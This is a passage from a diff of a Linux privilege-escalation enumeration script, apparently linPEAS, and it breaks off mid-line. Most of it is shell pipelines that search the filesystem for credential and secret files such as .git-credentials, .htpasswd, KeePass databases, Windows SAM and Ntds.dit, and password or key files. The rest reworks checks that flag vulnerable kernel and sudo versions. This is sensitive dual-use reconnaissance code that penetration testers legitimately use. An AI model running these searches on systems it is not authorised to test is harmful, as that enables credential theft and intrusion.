"$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_INFLUXDB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "influxdb\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ZABBIX=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "zabbix_server\.conf$|zabbix_agentd\.conf$|zabbix$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.svn$" | sort | uniq | head -n 70) + PSTORAGE_KEEPASS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.kdbx$|KeePass\.config.*$|KeePass\.ini$|KeePass\.enforced.*$" | sort | uniq | head -n 70) + PSTORAGE_FTP=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.ftpconfig$|ffftp\.ini$|ftp\.ini$|ftp\.config$|sites\.ini$|wcx_ftp\.ini$|winscp\.ini$|ws_ftp\.ini$" | sort | uniq | head -n 70) + PSTORAGE_BIND=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc|^/usr|^/var" | grep -E "bind$" | sort | uniq | head -n 70) + PSTORAGE_SEEDDMS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "seeddms.*$" | sort | uniq | head -n 70) + PSTORAGE_DDCLIENT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "ddclient\.conf$" | sort | uniq | head -n 70) + PSTORAGE_KCPASSWORD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "kcpassword$" | sort | uniq | head -n 70) + PSTORAGE_SENTRY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sentry$|sentry\.conf\.py$" | sort | uniq | head -n 70) + PSTORAGE_STRAPI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "environments$" | sort | uniq | head -n 70) + PSTORAGE_CACTI=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "cacti$" | sort | uniq | head -n 70) + PSTORAGE_ROUNDCUBE=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "roundcube$" | sort | uniq | head -n 70) + PSTORAGE_PASSBOLT=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "passbolt\.php$" | sort | uniq | head -n 70) + PSTORAGE_JETTY=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "jetty-realm\.properties$" | sort | uniq | head -n 70) + PSTORAGE_WGET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.wgetrc$" | sort | uniq | head -n 70) + PSTORAGE_INTERESTING_LOGS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "access\.log$|error\.log$" | sort | uniq | head -n 70) + PSTORAGE_OTHER_INTERESTING_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "\.bashrc$|\.google_authenticator$|hosts\.equiv$|\.lesshst$|\.plan$|\.profile$|\.recently-used\.xbel$|\.rhosts$|\.sudo_as_admin_successful$" | sort | uniq | head -n 70) + PSTORAGE_WINDOWS_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "unattend\.inf$|.*\.rdg$|AppEvent\.Evt$|ConsoleHost_history\.txt$|FreeSSHDservice\.ini$|NetSetup\.log$|Ntds\.dit$|protecteduserkey\.bin$|RDCMan\.settings$|SAM$|SYSTEM$|SecEvent\.Evt$|appcmd\.exe$|bash\.exe$|datasources\.xml$|default\.sav$|drives\.xml$|groups\.xml$|https-xampp\.conf$|https\.conf$|iis6\.log$|index\.dat$|my\.cnf$|my\.ini$|ntuser\.dat$|pagefile\.sys$|printers\.xml$|recentservers\.xml$|scclient\.exe$|scheduledtasks\.xml$|security\.sav$|server\.xml$|setupinfo$|setupinfo\.bak$|sitemanager\.xml$|sites\.ini$|software$|software\.sav$|sysprep\.inf$|sysprep\.xml$|system\.sav$|unattend\.txt$|unattend\.xml$|unattended\.xml$|wcx_ftp\.ini$|ws_ftp\.ini$|web.*\.config$|winscp\.ini$|wsl\.exe$" | sort | uniq | head -n 70) + PSTORAGE_DATABASE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -v -E '/man/|/usr/|/var/cache/' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*\.db$|.*\.sqlite$|.*\.sqlite3$" | sort | uniq | head -n 70) + PSTORAGE_BACKUPS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "backup$|backups$" | sort | uniq | head -n 70) + PSTORAGE_PASSWORD_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*password.*$|.*credential.*$|creds.*$|.*\.key$" | sort | uniq | head -n 70) ##### POST SERACH VARIABLES ##### @@ -1233,154 +1234,165 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) + + + + + + + + +if echo $CHECKS | grep -q system_information; +print_title "System Information" +########################################### +#-------------) System Info (-------------# +########################################### + +#-- SY) OS +print_2title "Operative system" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} 